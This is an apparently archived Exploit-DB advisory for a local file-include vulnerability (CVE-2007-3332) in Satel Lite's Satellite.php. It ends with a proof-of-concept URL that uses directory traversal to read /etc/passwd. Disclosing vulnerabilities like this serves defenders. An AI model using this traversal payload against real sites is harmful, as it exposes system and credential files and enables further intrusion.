Satel Lite Satellite.PHP Local File Include Vulnerability

2007-11-26T00:00:00
ID EDB-ID:29782
Type exploitdb
Reporter rUnViRuS
Modified 2007-11-26T00:00:00

Description

Satel Lite Satellite.PHP Local File Include Vulnerability. CVE-2007-3332. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/23143/info

Satel Lite is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to access sensitive information and to execute local script code in the context of the application; this may facilitate other attacks against the affected computer.

http://www.example.com/nuke_path/Satellite.php?op=modload&name=../../../../../../etc/passwd&file=index